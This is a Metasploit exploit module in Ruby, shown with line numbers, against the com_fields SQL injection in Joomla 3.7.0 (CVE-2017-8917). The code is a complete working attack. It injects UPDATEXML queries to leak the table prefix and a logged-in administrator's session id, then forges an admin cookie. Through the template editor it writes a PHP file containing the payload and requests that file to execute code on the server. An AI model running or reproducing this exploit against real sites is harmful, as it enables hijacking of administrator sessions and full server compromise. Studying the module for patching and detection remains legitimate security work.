Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::FileDropper
11
  include Msf::Exploit::Remote::HTTP::Joomla
12

13
  def initialize(info={})
14
    super(update_info(info,
15
      'Name'           => 'Joomla Component Fields SQLi Remote Code Execution',
16
      'Description'    => %q{
17
        This module exploits a SQL injection vulnerability in the com_fields
18
        component, which was introduced to the core of Joomla in version 3.7.0.
19
      },
20
      'License'        => MSF_LICENSE,
21
      'Author'         =>
22
        [
23
          'Mateus Lino', # Vulnerability discovery
24
          'luisco100 <luisco100[at]gmail.com>' # Metasploit module
25
        ],
26
      'References'     =>
27
        [
28
          [ 'CVE', '2017-8917' ], # SQLi
29
          [ 'EDB', '42033' ],
30
          [ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ]
31
        ],
32
      'Payload'        =>
33
        {
34
          'DisableNops' => true,
35
          # Arbitrary big number. The payload gets sent as POST data, so
36
          # really it's unlimited
37
          'Space'       => 262144, # 256k
38
        },
39
      'Platform'       => ['php'],
40
      'Arch'           => ARCH_PHP,
41
      'Targets'        =>
42
        [
43
          [ 'Joomla 3.7.0', {} ]
44
        ],
45
      'Privileged'     => false,
46
      'DisclosureDate' => '2017-05-17',
47
      'DefaultTarget'  => 0))
48

49
  end
50

51
  def check
52
    # Request using a non-existing table
53
    val = sqli(rand_text_alphanumeric(rand(10)+6), 'check')
54

55
    if val.nil?
56
      return Exploit::CheckCode::Safe
57
    else
58
      return Exploit::CheckCode::Vulnerable
59
    end
60
  end
61

62

63
  def sqli(tableprefix, option)
64
    # SQLi will grab Super User or Administrator sessions with a valid username and userid (else they are not logged in).
65
    # The extra search for userid!=0 is because of our SQL data that's inserted in the session cookie history.
66
    # This way we make sure that's excluded and we only get real Administrator or Super User sessions.
67
    if option == 'check'
68
      start = rand_text_alpha(5)
69
      start_h = start.unpack('H*')[0]
70
      fin = rand_text_alpha(5)
71
      fin_h = fin.unpack('H*')[0]
72

73
      sql = "(UPDATEXML(2170,CONCAT(0x2e,0x#{start_h},(SELECT MID((IFNULL(CAST(TO_BASE64(table_name) AS CHAR),0x20)),1,22) FROM information_schema.tables order by update_time DESC LIMIT 1),0x#{fin_h}),4879))"
74
    else
75
      start = rand_text_alpha(3)
76
      start_h = start.unpack('H*')[0]
77
      fin = rand_text_alpha(3)
78
      fin_h = fin.unpack('H*')[0]
79

80
      sql = "(UPDATEXML(2170,CONCAT(0x2e,0x#{start_h},(SELECT MID(session_id,1,42) FROM #{tableprefix}session where userid!=0 LIMIT 1),0x#{fin_h}),4879))"
81
    end
82

83
    # Retrieve cookies
84
    res = send_request_cgi({
85
      'method'   => 'GET',
86
      'uri'      => normalize_uri(target_uri.path, 'index.php'),
87
      'vars_get' => {
88
        'option' => 'com_fields',
89
        'view' => 'fields',
90
        'layout'=> 'modal',
91
        'list[fullordering]' => sql
92
        }
93
      })
94

95
    if res && res.code == 500 && res.body =~ /#{start}(.*)#{fin}/
96
      return $1
97
    end
98
    return nil
99
  end
100

101

102
  def exploit
103
    # Request using a non-existing table first, to retrieve the table prefix
104
    val = sqli(rand_text_alphanumeric(rand(10)+6), 'check')
105
    if val.nil?
106
      fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix")
107
    else
108
      table_prefix = Base64.decode64(val)
109
      table_prefix.sub! '_session', ''
110
      print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]")
111
    end
112

113
    # Retrieve the admin session using our retrieved table prefix
114
    val = sqli("#{table_prefix}_", 'exploit')
115
    if val.nil?
116
      fail_with(Failure::Unknown, "#{peer}: No logged-in Administrator or Super User user found!")
117
    else
118
      auth_cookie_part = val
119
      print_status("#{peer} - Retrieved cookie [ #{auth_cookie_part} ]")
120
    end
121

122
    # Retrieve cookies
123
    res = send_request_cgi({
124
      'method'   => 'GET',
125
      'uri'      => normalize_uri(target_uri.path, 'administrator', 'index.php')
126
    })
127

128
    if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/
129
      cookie_begin = $1
130
      print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]")
131
    else
132
      fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie")
133
    end
134

135
    # Modify cookie to authenticated admin
136
    auth_cookie = cookie_begin
137
    auth_cookie << '='
138
    auth_cookie << auth_cookie_part
139
    auth_cookie << ';'
140

141
    # Authenticated session
142
    res = send_request_cgi({
143
      'method'   => 'GET',
144
      'uri'      => normalize_uri(target_uri.path, 'administrator', 'index.php'),
145
      'cookie'  => auth_cookie
146
      })
147

148
    if res && res.code == 200 && res.body =~ /Control Panel -(.*?)- Administration/
149
      print_good("#{peer} - Successfully authenticated")
150
    else
151
      fail_with(Failure::Unknown, "#{peer} - Session failure")
152
    end
153

154
    # Retrieve template view
155
    res = send_request_cgi({
156
      'method'   => 'GET',
157
      'uri'      => normalize_uri(target_uri.path, 'administrator', 'index.php'),
158
      'cookie'  => auth_cookie,
159
      'vars_get' => {
160
        'option' => 'com_templates',
161
        'view' => 'templates'
162
        }
163
      })
164

165
    # We try to retrieve and store the first template found
166
    if res && res.code == 200 && res.body =~ /\/administrator\/index.php\?option=com_templates&amp;view=template&amp;id=([0-9]+)&amp;file=([a-zA-Z0-9=]+)/
167
      template_id = $1
168
      file_id = $2
169

170
      form = res.body.split(/<form action=([^\>]+) method="post" name="adminForm" id="adminForm"\>(.*)<\/form>/mi)
171
      input_hidden = form[2].split(/<input type="hidden"([^\>]+)\/>/mi)
172
      input_id = input_hidden[7].split("\"")
173
      input_id = input_id[1]
174

175
    else
176
      fail_with(Failure::Unknown, "Unable to retrieve template")
177
    end
178

179

180

181
    filename = rand_text_alphanumeric(rand(10)+6)
182
    # Create file
183
    print_status("#{peer} - Creating file [ #{filename}.php ]")
184
    res = send_request_cgi({
185
      'method'   => 'POST',
186
      'uri'      => normalize_uri(target_uri.path, 'administrator', 'index.php'),
187
      'cookie'  => auth_cookie,
188
      'vars_get' => {
189
        'option' => 'com_templates',
190
        'task' => 'template.createFile',
191
        'id' => template_id,
192
        'file' => file_id,
193
        },
194
      'vars_post' => {
195
        'type' => 'php',
196
        'address' => '',
197
        input_id => '1',
198
        'name' => filename
199
      }
200
      })
201

202
    # Grab token
203
    if res && res.code == 303 && res.headers['Location']
204
      location = res.headers['Location']
205
      print_status("#{peer} - Following redirect to [ #{location} ]")
206
      res = send_request_cgi(
207
        'uri'    => location,
208
        'method' => 'GET',
209
        'cookie' => auth_cookie
210
      )
211

212
      # Retrieving template token
213
      if res && res.code == 200 && res.body =~ /&amp;([a-z0-9]+)=1\">/
214
        token = $1
215
        print_status("#{peer} - Token [ #{token} ] retrieved")
216
      else
217
        fail_with(Failure::Unknown, "#{peer} - Retrieving token failed")
218
      end
219

220
      if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/
221
        template_path = $1
222
        print_status("#{peer} - Template path [ #{template_path} ] retrieved")
223
      else
224
        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path")
225
      end
226

227
    else
228
      fail_with(Failure::Unknown, "#{peer} - Creating file failed")
229
    end
230

231
    filename_base64 = Rex::Text.encode_base64("/#{filename}.php")
232

233
    # Inject payload data into file
234
    print_status("#{peer} - Insert payload into file [ #{filename}.php ]")
235
    res = send_request_cgi({
236
      'method'   => 'POST',
237
      'uri'      => normalize_uri(target_uri.path, "administrator", "index.php"),
238
      'cookie'  => auth_cookie,
239
      'vars_get' => {
240
        'option' => 'com_templates',
241
        'view' => 'template',
242
        'id' => template_id,
243
        'file' => filename_base64,
244
        },
245
      'vars_post' => {
246
        'jform[source]' => payload.encoded,
247
        'task' => 'template.apply',
248
        token => '1',
249
        'jform[extension_id]' => template_id,
250
        'jform[filename]' => "/#{filename}.php"
251
      }
252
      })
253

254
    if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/
255
      print_status("#{peer} - Payload data inserted into [ #{filename}.php ]")
256
    else
257
      fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]")
258
    end
259

260
    # Request payload
261
    register_files_for_cleanup("#{filename}.php")
262
    print_status("#{peer} - Executing payload")
263
    res = send_request_cgi({
264
      'method'   => 'POST',
265
      'uri'      => normalize_uri(target_uri.path, template_path, "#{filename}.php"),
266
      'cookie'  => auth_cookie
267
    })
268
  end
269
end
270

271